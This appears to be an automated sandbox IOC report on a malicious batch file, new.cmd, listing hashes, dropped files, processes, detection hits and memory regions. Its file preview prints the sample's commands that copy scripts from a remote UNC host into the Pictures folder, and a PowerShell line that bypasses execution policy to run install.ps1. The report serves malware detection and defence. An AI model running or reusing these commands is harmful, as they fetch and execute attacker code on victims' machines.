Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

new.cmd

DOS batch file, ASCII text, with CRLF line terminators

initial sample

Details

Filetype:	DOS batch file, ASCII text, with CRLF line terminators
Entropy:	4.978302807529341
Filename:	new.cmd
Filesize:	1296
MD5:	acd0ea2571fae686554e0be7c5d71d1a
SHA1:	6853c3d910064c2ee4598c0fc66b56016663861c
SHA256:	62530bcccbb2524a0b33eba537eee508b3c86b5b535bffaf24b5d50c1fc8e5f8
SHA512:	78fbc61d42021a06b993091e2b9e034db438bf3d0f10f2b0bfcc391008590f3235675a46cdd30625a5da9bcccdbaa492b408370146d3bda4388c96c764516213
SSDEEP:	24:wBKH0zO8RbYQApQZhQelQDJPZTW4FuRbeaiRbraJ0m9tkmuF24pyKWSNg:iuqf2QiQZhQelQNZTW4szidaJ0mbkmD3
Preview:	@echo off..set source=\\surgical-farming-ca.com@9809\google..set destination=%USERPROFILE%\Pictures....REM Copy cmd files (las.cmd, kam.cmd, xff.cmd, zap.cmd) to the destination folder..copy /Y "%source%\las.cmd" "%destination%"..copy /Y "%source%\kam.cmd

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

data

dropped

Details

File:	C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Category:	dropped
Dump:	StartupProfileData-NonInteractive.3.dr
ID:	dr_2
Target ID:	3
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	data
Entropy:	0.34726597513537405
Encrypted:	false
Ssdeep:	3:Nlll:Nll
Size:	64
Whitelisted:	false
Reputation:	high

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wo3hzfje.uuq.ps1

ASCII text, with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wo3hzfje.uuq.ps1
Category:	dropped
Dump:	__PSScriptPolicyTest_wo3hzfje.uuq.ps1.3.dr
ID:	dr_0
Target ID:	3
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with no line terminators
Entropy:	4.038920595031593
Encrypted:	false
Ssdeep:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size:	60
Whitelisted:	false
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Creates temporary files	System Summary

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xc45uhss.xtb.psm1

ASCII text, with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xc45uhss.xtb.psm1
Category:	dropped
Dump:	__PSScriptPolicyTest_xc45uhss.xtb.psm1.3.dr
ID:	dr_1
Target ID:	3
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with no line terminators
Entropy:	4.038920595031593
Encrypted:	false
Ssdeep:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size:	60
Whitelisted:	false
Reputation:	high

Processes

Path

Cmdline

Malicious

C:\Windows\System32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.cmd" "

Details

Is windows:	true
Is dropped:	false
PID:	7264
Target ID:	0
Parent PID:	4084
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\System32\cmd.exe
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.cmd" "
Size:	289792
MD5:	8A2122E8162DBEF04694B9C3E0B6CDEE
Time:	15:01:02
Date:	23/05/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff7679d0000
Modulesize:	421888
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Change PowerShell Policies to an Insecure Level	System Summary
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -File "C:\Users\user\Pictures\install.ps1"

Details

Is windows:	true
Is dropped:	false
PID:	7356
Target ID:	3
Parent PID:	7264
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	powershell -ExecutionPolicy Bypass -File "C:\Users\user\Pictures\install.ps1"
Size:	452608
MD5:	04029E121A0CFA5991749937DD22A1D9
Time:	15:01:02
Date:	23/05/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff6cb6b0000
Modulesize:	462848
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Bypasses PowerShell execution policy	HIPS / PFW / Operating System Protection Evasion	PowerShell
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Change PowerShell Policies to an Insecure Level	System Summary
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	7280
Target ID:	2
Parent PID:	7264
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	15:01:02
Date:	23/05/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff6ee680000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

https://go.microsoft.coP

unknown

https://aka.ms/pscore6

unknown

https://aka.ms/pscore68

unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

unknown

Memdumps

Base Address

Regiontype

Protect

Malicious

7DF4E3D30000

trusted library allocation

page execute and read and write

17773401000

trusted library allocation

page read and write

7FFB4B1D0000

trusted library allocation

page execute and read and write

1A012BE000

stack

page read and write

17761800000

trusted library allocation

page read and write

7FFB4B2C7000

trusted library allocation

page read and write

7FFB4B11D000

trusted library allocation

page execute and read and write

17761770000

heap

page read and write

17773411000

trusted library allocation

page read and write

1776344A000

trusted library allocation

page read and write

7FFB4B120000

trusted library allocation

page read and write

1A014BE000

stack

page read and write

17773473000

trusted library allocation

page read and write

17763452000

trusted library allocation

page read and write

1776330C000

heap

page read and write

7FFB4B12C000

trusted library allocation

page read and write

177632E8000

heap

page read and write

7FFB4B230000

trusted library allocation

page execute and read and write

1776349A000

trusted library allocation

page read and write

17763294000

heap

page read and write

7FFB4B123000

trusted library allocation

page read and write

7FFB4B1CC000

trusted library allocation

page execute and read and write

7FFB4B1C6000

trusted library allocation

page read and write

17761820000

trusted library allocation

page read and write

17763412000

trusted library allocation

page read and write

177615A0000

heap

page read and write

17761830000

heap

page readonly

17763200000

heap

page read and write

1A0117E000

stack

page read and write

1A01337000

stack

page read and write

177632A0000

heap

page read and write

17761934000

heap

page read and write

1A00F7E000

stack

page read and write

177618F0000

heap

page execute and read and write

1A0107D000

stack

page read and write

1A0153E000

stack

page read and write

1A013BE000

stack

page read and write

1776169C000

heap

page read and write

7FFB4B1C0000

trusted library allocation

page read and write

177615CF000

heap

page read and write

17761686000

heap

page read and write

177618B0000

trusted library allocation

page read and write

7FFB4B2D0000

trusted library allocation

page execute and read and write

1776341B000

trusted library allocation

page read and write

177633F0000

heap

page execute and read and write

1A00FFE000

stack

page read and write

177615A8000

heap

page read and write

17763290000

heap

page read and write

177615DE000

heap

page read and write

1A00BD6000

stack

page read and write

177615C9000

heap

page read and write

1A00EFF000

stack

page read and write

177615DC000

heap

page read and write

17761930000

heap

page read and write

7FFB4B2C1000

trusted library allocation

page read and write

1A010FF000

stack

page read and write

1A00E7E000

stack

page read and write

1776346A000

trusted library allocation

page read and write

17763455000

trusted library allocation

page read and write

17761790000

heap

page read and write

17763401000

trusted library allocation

page read and write

7FFB4B112000

trusted library allocation

page read and write

7FFB4B1F6000

trusted library allocation

page execute and read and write

17761580000

heap

page read and write

177615FC000

heap

page read and write

17761625000

heap

page read and write

7FFB4B113000

trusted library allocation

page execute and read and write

1A0143A000

stack

page read and write

17773407000

trusted library allocation

page read and write

1A011FE000

stack

page read and write

1776333A000

heap

page read and write

1777B7D1000

heap

page read and write

7FFB4B2B0000

trusted library allocation

page read and write

177617C0000

heap

page read and write

7FFB4B114000

trusted library allocation

page read and write

1A01279000

stack

page read and write

7FFB4B2C5000

trusted library allocation

page read and write

There are 67 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
new.cmd

Files

Processes

URLs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportnew.cmd

Files

Processes

URLs

Memdumps

IOC Report
new.cmd